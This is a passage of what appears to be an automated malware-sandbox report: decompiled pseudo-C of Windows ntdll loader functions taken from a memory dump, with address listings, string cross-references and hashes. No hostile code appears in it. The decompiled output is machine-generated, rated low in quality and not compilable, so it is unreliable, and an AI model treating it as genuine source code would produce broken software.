								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E009FBB40(0,  &_v68, _t170);
									if(L009C43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E009FBB40(_t257,  &_v68, _t243);
								if(L009C43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00A01370(_t278, 0x994e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L009D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E009FF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00A01370(_v16, 0x994e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E009FBB40(_t262,  &_v68, _t244);
								if(L009C43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00A01370(_t282, 0x994e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E009FBB40(_t262,  &_v68, _t201);
							if(L009C43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L009D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E009FF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00A01370(_t280, 0x994e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E009FBB40(_t267,  &_v68, _t245);
							if(L009C43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00A01370(_t284, 0x994e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E009FBB40(_t267,  &_v68, _t224);
						if(L009C43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                    0x009c3d3c
                                                                                    0x009c3d42
                                                                                    0x009c3d44
                                                                                    0x009c3d46
                                                                                    0x009c3d49
                                                                                    0x009c3d4c
                                                                                    0x009c3d4f
                                                                                    0x009c3d52
                                                                                    0x009c3d55
                                                                                    0x009c3d58
                                                                                    0x009c3d5b
                                                                                    0x009c3d5f
                                                                                    0x009c3d61
                                                                                    0x009c3d66
                                                                                    0x00a18213
                                                                                    0x00a18218
                                                                                    0x009c4085
                                                                                    0x009c4088
                                                                                    0x009c408e
                                                                                    0x009c4094
                                                                                    0x009c409a
                                                                                    0x009c40a0
                                                                                    0x009c40a6
                                                                                    0x009c40a9
                                                                                    0x009c40af
                                                                                    0x009c40b6
                                                                                    0x009c40bd
                                                                                    0x009c40bd
                                                                                    0x009c3d83
                                                                                    0x00a1821f
                                                                                    0x00a18229
                                                                                    0x00a18238
                                                                                    0x00a18238
                                                                                    0x00a1823d
                                                                                    0x00a1823d
                                                                                    0x009c3da0
                                                                                    0x009c3daf
                                                                                    0x009c3db5
                                                                                    0x009c3dba
                                                                                    0x009c3dba
                                                                                    0x009c3dd4
                                                                                    0x009c3e94
                                                                                    0x009c3eab
                                                                                    0x009c3f6d
                                                                                    0x009c3f84
                                                                                    0x009c406b
                                                                                    0x009c406b
                                                                                    0x009c406e
                                                                                    0x009c406e
                                                                                    0x009c4070
                                                                                    0x009c4074
                                                                                    0x00a18351
                                                                                    0x00a18351
                                                                                    0x009c407a
                                                                                    0x009c407f
                                                                                    0x00a1835d
                                                                                    0x00a18370
                                                                                    0x00a18377
                                                                                    0x00a18379
                                                                                    0x00a1837c
                                                                                    0x00a1837c
                                                                                    0x00a1835d
                                                                                    0x00000000
                                                                                    0x009c407f
                                                                                    0x009c3f8a
                                                                                    0x009c3f8d
                                                                                    0x009c3f90
                                                                                    0x009c3f95
                                                                                    0x00a1830d
                                                                                    0x00a1830f
                                                                                    0x009c3f9b
                                                                                    0x009c3fac
                                                                                    0x009c3fae
                                                                                    0x009c3fb1
                                                                                    0x009c3fb1
                                                                                    0x009c3fb6
                                                                                    0x00a18317
                                                                                    0x00a1831a
                                                                                    0x00000000
                                                                                    0x009c3fbc
                                                                                    0x009c3fc1
                                                                                    0x009c3fc9
                                                                                    0x009c3fd7
                                                                                    0x009c3fda
                                                                                    0x009c3fdd
                                                                                    0x009c4021
                                                                                    0x009c4021
                                                                                    0x009c4029
                                                                                    0x009c4030
                                                                                    0x009c4044
                                                                                    0x009c4046
                                                                                    0x009c4046
                                                                                    0x009c4044
                                                                                    0x009c4049
                                                                                    0x00a18327
                                                                                    0x00a18334
                                                                                    0x00a18339
                                                                                    0x00a1833c
                                                                                    0x009c404f
                                                                                    0x009c404f
                                                                                    0x009c404f
                                                                                    0x009c4051
                                                                                    0x009c4056
                                                                                    0x009c4063
                                                                                    0x009c4063
                                                                                    0x009c4068
                                                                                    0x00000000
                                                                                    0x009c4068
                                                                                    0x009c3fdf
                                                                                    0x009c3fe2
                                                                                    0x009c3fe4
                                                                                    0x009c3fe7
                                                                                    0x009c3fef
                                                                                    0x009c4003
                                                                                    0x009c4005
                                                                                    0x009c4005
                                                                                    0x009c400c
                                                                                    0x009c4013
                                                                                    0x009c4016
                                                                                    0x009c4017
                                                                                    0x009c401b
                                                                                    0x009c401e
                                                                                    0x00000000
                                                                                    0x009c401e
                                                                                    0x009c3fb6
                                                                                    0x009c3eb1
                                                                                    0x009c3eb4
                                                                                    0x009c3eb7
                                                                                    0x009c3ebc
                                                                                    0x00a182a9
                                                                                    0x00a182ab
                                                                                    0x009c3ec2
                                                                                    0x009c3ed3
                                                                                    0x009c3ed5
                                                                                    0x009c3ed8
                                                                                    0x009c3ed8
                                                                                    0x009c3edd
                                                                                    0x00a182b3
                                                                                    0x00a182b6
                                                                                    0x00000000
                                                                                    0x009c3ee3
                                                                                    0x009c3ee8
                                                                                    0x009c3eed
                                                                                    0x009c3ef0
                                                                                    0x009c3ef3
                                                                                    0x009c3f02
                                                                                    0x009c3f05
                                                                                    0x009c3f08
                                                                                    0x00a182c0
                                                                                    0x00a182c3
                                                                                    0x00a182c5
                                                                                    0x00a182c8
                                                                                    0x00a182d0
                                                                                    0x00a182e4
                                                                                    0x00a182e6
                                                                                    0x00a182e6
                                                                                    0x00a182ed
                                                                                    0x00a182f4
                                                                                    0x00a182f7
                                                                                    0x00a182f8
                                                                                    0x00a182fc
                                                                                    0x00a182ff
                                                                                    0x00a182ff
                                                                                    0x009c3f0e
                                                                                    0x009c3f11
                                                                                    0x009c3f16
                                                                                    0x009c3f1d
                                                                                    0x009c3f31
                                                                                    0x00a18307
                                                                                    0x00a18307
                                                                                    0x009c3f31
                                                                                    0x009c3f39
                                                                                    0x009c3f48
                                                                                    0x009c3f4d
                                                                                    0x009c3f50
                                                                                    0x009c3f50
                                                                                    0x009c3f53
                                                                                    0x009c3f58
                                                                                    0x009c3f65
                                                                                    0x009c3f65
                                                                                    0x009c3f6a
                                                                                    0x00000000
                                                                                    0x009c3f6a
                                                                                    0x009c3edd
                                                                                    0x009c3dda
                                                                                    0x009c3ddd
                                                                                    0x009c3de0
                                                                                    0x009c3de5
                                                                                    0x00a18245
                                                                                    0x009c3deb
                                                                                    0x009c3df7
                                                                                    0x009c3dfc
                                                                                    0x009c3dfe
                                                                                    0x009c3e01
                                                                                    0x009c3e01
                                                                                    0x009c3e06
                                                                                    0x00a1824d
                                                                                    0x00a1824f
                                                                                    0x00a18254
                                                                                    0x00000000
                                                                                    0x009c3e0c
                                                                                    0x009c3e11
                                                                                    0x009c3e16
                                                                                    0x009c3e19
                                                                                    0x009c3e29
                                                                                    0x009c3e2c
                                                                                    0x009c3e2f
                                                                                    0x00a1825c
                                                                                    0x00a1825f
                                                                                    0x00a18261
                                                                                    0x00a18264
                                                                                    0x00a1826c
                                                                                    0x00a18280
                                                                                    0x00a18282
                                                                                    0x00a18282
                                                                                    0x00a18289
                                                                                    0x00a18290
                                                                                    0x00a18293
                                                                                    0x00a18294
                                                                                    0x00a18298
                                                                                    0x00a1829b
                                                                                    0x00a1829b
                                                                                    0x009c3e35
                                                                                    0x009c3e38
                                                                                    0x009c3e3d
                                                                                    0x009c3e44
                                                                                    0x009c3e58
                                                                                    0x00a182a3
                                                                                    0x00a182a3
                                                                                    0x009c3e58
                                                                                    0x009c3e60
                                                                                    0x009c3e6f
                                                                                    0x009c3e74
                                                                                    0x009c3e77
                                                                                    0x009c3e77
                                                                                    0x009c3e7a
                                                                                    0x009c3e7f
                                                                                    0x009c3e8c
                                                                                    0x009c3e8c
                                                                                    0x009c3e91
                                                                                    0x00000000
                                                                                    0x009c3e91

                                                                                    Strings
                                                                                    • WindowsExcludedProcs, xrefs: 009C3D6F
                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 009C3D8C
                                                                                    • Kernel-MUI-Language-SKU, xrefs: 009C3F70
                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 009C3DC0
                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 009C3E97
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                    • API String ID: 0-258546922
                                                                                    • Opcode ID: 8785e23849646236c74613e1068ca76b5d1f594ba20f6738e8e0f70c4b479f97
                                                                                    • Instruction ID: 5e834f20e5b6d2a32a9a85b168b9e58deae8445361c442ee105d46375cd5c18b
                                                                                    • Opcode Fuzzy Hash: 8785e23849646236c74613e1068ca76b5d1f594ba20f6738e8e0f70c4b479f97
                                                                                    • Instruction Fuzzy Hash: 81F14972D40218EFCB12DF98C981EEEBBB9FF48750F14446AE905A7251E7349E41CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009E8E00, Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 44%
                                                                                    			E009E8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xaad360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xaa8464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xaa5780 & 0x00000003) != 0) {
							E00A35510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xaa5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E009FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xaa7984; // 0x492b48
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xaa8464; // 0x75150110
					 *0xaab1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E009E9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xaa5780 & 0x00000005) != 0) {
						_push(_t49);
						E00A35510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                    0x009e8e0f
                                                                                    0x009e8e16
                                                                                    0x009e8e19
                                                                                    0x009e8e1b
                                                                                    0x009e8e21
                                                                                    0x009e8e7f
                                                                                    0x009e8e85
                                                                                    0x00a29354
                                                                                    0x00a2936c
                                                                                    0x00a29371
                                                                                    0x00a2937b
                                                                                    0x00a29381
                                                                                    0x00a29381
                                                                                    0x00a2937b
                                                                                    0x009e8e9d
                                                                                    0x009e8e9d
                                                                                    0x009e8e29
                                                                                    0x009e8e2c
                                                                                    0x009e8e38
                                                                                    0x009e8e3e
                                                                                    0x009e8e43
                                                                                    0x009e8eb5
                                                                                    0x009e8eb9
                                                                                    0x00a292aa
                                                                                    0x00a292af
                                                                                    0x00a292e8
                                                                                    0x00a292e8
                                                                                    0x00a292af
                                                                                    0x009e8eb9
                                                                                    0x009e8e45
                                                                                    0x009e8e53
                                                                                    0x009e8e5b
                                                                                    0x009e8e5f
                                                                                    0x009e8e78
                                                                                    0x009e8e78
                                                                                    0x009e8e7d
                                                                                    0x009e8ec3
                                                                                    0x009e8ecd
                                                                                    0x009e8ed2
                                                                                    0x009e8ed2
                                                                                    0x009e8ec5
                                                                                    0x009e8ec5
                                                                                    0x00000000
                                                                                    0x009e8e7d
                                                                                    0x009e8e67
                                                                                    0x009e8ea4
                                                                                    0x00a2931a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a29320
                                                                                    0x009e8ea4
                                                                                    0x009e8e70
                                                                                    0x00a29325
                                                                                    0x00a29340
                                                                                    0x00a29345
                                                                                    0x00a29345
                                                                                    0x009e8e76
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000

                                                                                    Strings
                                                                                    • H+I, xrefs: 009E8E2C
                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 00A29357
                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00A2932A
                                                                                    • LdrpFindDllActivationContext, xrefs: 00A29331, 00A2935D
                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 00A2933B, 00A29367
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: H+I$LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                    • API String ID: 0-1996516338
                                                                                    • Opcode ID: 5315b61aa43f581d64c91983dee8c50a190e68c25c8a2c2e4c558b7e6f8dbd77
                                                                                    • Instruction ID: 7a25df73275752356d4f3008714e8e56d7ee070713f83693e922957d7a386bfd
                                                                                    • Opcode Fuzzy Hash: 5315b61aa43f581d64c91983dee8c50a190e68c25c8a2c2e4c558b7e6f8dbd77
                                                                                    • Instruction Fuzzy Hash: A4411932E003959FDF36FBDA884DA77B268AB51758F06456DE80C57191EF605D808381
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009C8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 83%
                                                                                    			E009C8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E009C934A() != 0) {
								_t159 = E00A3A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xaa5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00A35510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xaa5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E009C849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E009C8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E009C8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xaa5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xaa5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E009D2280(_t92, 0xaa86cc);
															_t94 = E00A89DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E009E61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xaa5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E009C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xaa5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xaa5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E009FF380(_t136, 0x991184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E009D2280(_t108, 0xaa86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E009E61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00A89D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E009CFFB0(_t118, _t156, 0xaa86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E009F9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                    0x009c8799
                                                                                    0x009c879d
                                                                                    0x009c87a1
                                                                                    0x009c87a3
                                                                                    0x009c87a8
                                                                                    0x009c87c3
                                                                                    0x009c87c3
                                                                                    0x009c87c8
                                                                                    0x009c87d1
                                                                                    0x009c87d4
                                                                                    0x009c87d8
                                                                                    0x009c87e5
                                                                                    0x009c87ec
                                                                                    0x00a19bfe
                                                                                    0x00a19c00
                                                                                    0x00a19c02
                                                                                    0x00a19c08
                                                                                    0x00a19c0d
                                                                                    0x00a19c0f
                                                                                    0x00a19c14
                                                                                    0x00a19c2d
                                                                                    0x00a19c32
                                                                                    0x00a19c37
                                                                                    0x00a19c3a
                                                                                    0x00a19c3c
                                                                                    0x00a19c42
                                                                                    0x00a19c42
                                                                                    0x00a19c3c
                                                                                    0x00a19c02
                                                                                    0x009c87da
                                                                                    0x009c87df
                                                                                    0x009c87e3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009c87e3
                                                                                    0x009c87f2
                                                                                    0x00000000
                                                                                    0x009c87fb
                                                                                    0x009c87fd
                                                                                    0x009c87fe
                                                                                    0x009c880e
                                                                                    0x009c880f
                                                                                    0x009c8810
                                                                                    0x009c8814
                                                                                    0x009c881a
                                                                                    0x009c881c
                                                                                    0x009c881f
                                                                                    0x009c8821
                                                                                    0x009c8822
                                                                                    0x009c8824
                                                                                    0x009c8826
                                                                                    0x009c882c
                                                                                    0x009c882e
                                                                                    0x00a19c48
                                                                                    0x00a19c48
                                                                                    0x009c8834
                                                                                    0x009c8834
                                                                                    0x009c8837
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009c8837
                                                                                    0x009c882e
                                                                                    0x009c883d
                                                                                    0x009c8840
                                                                                    0x009c8843
                                                                                    0x009c8846
                                                                                    0x009c8849
                                                                                    0x009c884c
                                                                                    0x009c884e
                                                                                    0x009c8850
                                                                                    0x009c8852
                                                                                    0x009c8854
                                                                                    0x009c8857
                                                                                    0x009c88b4
                                                                                    0x009c88b6
                                                                                    0x009c88b6
                                                                                    0x009c8859
                                                                                    0x009c8859
                                                                                    0x009c8859
                                                                                    0x009c8861
                                                                                    0x009c8866
                                                                                    0x009c886a
                                                                                    0x009c893d
                                                                                    0x009c8941
                                                                                    0x00000000
                                                                                    0x009c8947
                                                                                    0x009c8947
                                                                                    0x009c894a
                                                                                    0x009c894c
                                                                                    0x00000000
                                                                                    0x009c8952
                                                                                    0x009c8955
                                                                                    0x009c895a
                                                                                    0x009c895d
                                                                                    0x009c895d
                                                                                    0x009c895f
                                                                                    0x009c8961
                                                                                    0x009c8961
                                                                                    0x009c8968
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009c896a
                                                                                    0x009c896b
                                                                                    0x009c896e
                                                                                    0x00000000
                                                                                    0x009c8970
                                                                                    0x009c8970
                                                                                    0x009c8970
                                                                                    0x009c8970
                                                                                    0x009c8972
                                                                                    0x009c8972
                                                                                    0x009c8974
                                                                                    0x00000000
                                                                                    0x009c897a
                                                                                    0x009c897a
                                                                                    0x009c897d
                                                                                    0x00000000
                                                                                    0x009c8983
                                                                                    0x00a19c65
                                                                                    0x00a19c6d
                                                                                    0x00a19c72
                                                                                    0x00a19c75
                                                                                    0x00a19c75
                                                                                    0x00a19c82
                                                                                    0x00a19c86
                                                                                    0x00a19c87
                                                                                    0x00a19c88
                                                                                    0x00a19c89
                                                                                    0x00a19c8c
                                                                                    0x00a19c90
                                                                                    0x00a19c95
                                                                                    0x00a19c97
                                                                                    0x00a19ca0
                                                                                    0x00a19ca3
                                                                                    0x00a19ca9
                                                                                    0x00a19ca9
                                                                                    0x00000000
                                                                                    0x00a19ca9
                                                                                    0x00a19ca3
                                                                                    0x00000000
                                                                                    0x00a19c97
                                                                                    0x009c897d
                                                                                    0x00000000
                                                                                    0x009c8974
                                                                                    0x009c8988
                                                                                    0x009c8992
                                                                                    0x009c8996
                                                                                    0x00000000
                                                                                    0x009c8996
